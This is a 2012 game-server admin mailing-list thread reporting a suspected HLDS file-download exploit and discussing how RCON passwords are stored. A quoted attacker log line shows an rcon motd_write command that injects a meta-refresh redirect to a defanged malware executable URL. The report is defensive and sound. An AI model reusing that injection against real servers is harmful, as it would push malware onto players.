Having the password on the command line would indeed be a concern for us if we didn't have our box to ourselves.
-Ken On Jul 3, 2012 7:44 PM, "Jesse Molina" <[email protected]> wrote: > > Yes, it does. > > I pointed this out to the author awhile ago privately. > > Just for clarity, to make sure nobody else thinks it's a good idea, IT IS > NOT A GOOD IDEA. =) > > This is the same reason that programs like sudo and ssh make it very > difficult for you to pass passwords on the command line. > > There are really very few things you can do to mitigate significant > security issues like this one. The best advice is to run nothing but game > servers on the host involved. > > > > doc wrote: > >> Is this an ok practice? I never thought about having my rcon password in >> my >> file - I guess it would be more secure if you just start it up with the >> rcon password in the string? Doesn't it show up when you run top/htop >> though? >> >> On Tue, Jul 3, 2012 at 12:05 PM, Ken Bateman <[email protected]> >> wrote: >> >> For quite a while we have been careful to specify our tf2 rcon passwords >>> on >>> the command line, not a config file, because we suspected the existence >>> of >>> an exploit like this. >>> >>> It's possible that the vulnerability might be in tcadmin. >>> >>> -Ken >>> On Jul 3, 2012 2:54 PM, "c0m4r" <[email protected]> wrote: >>> >>> There is an exploit in q3 engine named "q3dirtrav", which allows players >>>> to download any of server files, including server configuration >>>> (server.cfg).Today I found evidence of possible existence of the same >>>> exploit in HLDS.As a company we host hundreds of servers. We received >>>> >>> many >>> >>>> reports from our customers about strange HTTP refresh meta tag in the >>>> motd.txt of their servers, which leads to "http *//free -leaks >>>> *com/cstrike*exe".The problem has affected several different servers, >>>> unrelated to each other, with very different RCON passwords (but most >>>> >>> were >>> >>>> very strong).Here's what I have found in logfiles:Rcon from >>>> 178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write >>>> <META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks >>>> *com/cstrike*exe">This "cstrike.exe" contains some kind of a >>>> virus.(Note: I've replaced dot with asterisk and spaces)As you can see >>>> >>> the >>> >>>> attacker knew the RCON password of each server.Then I found >>>> "server.CFG.ztmp" file in cstrike of each server, which was attacked.For >>>> >>> me >>> >>>> that means that the attacker was able to download server.cfg exactly the >>>> same way as maps, models or sounds. >>>> ______________________________**_________________ >>>> To unsubscribe, edit your list preferences, or view the list archives, >>>> please visit: >>>> https://list.valvesoftware.**com/cgi-bin/mailman/listinfo/**hlds_linux<https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux> >>>> >>>> ______________________________**_________________ >>> To unsubscribe, edit your list preferences, or view the list archives, >>> please visit: >>> https://list.valvesoftware.**com/cgi-bin/mailman/listinfo/**hlds_linux<https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux> >>> >>> ______________________________**_________________ >> To unsubscribe, edit your list preferences, or view the list archives, >> please visit: >> https://list.valvesoftware.**com/cgi-bin/mailman/listinfo/**hlds_linux<https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux> >> >> > -- > # Jesse Molina > # Mail = [email protected] > # Cell = 1-602-323-7608 > > > > > > ______________________________**_________________ > To unsubscribe, edit your list preferences, or view the list archives, > please visit: > https://list.valvesoftware.**com/cgi-bin/mailman/listinfo/**hlds_linux<https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux> > _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
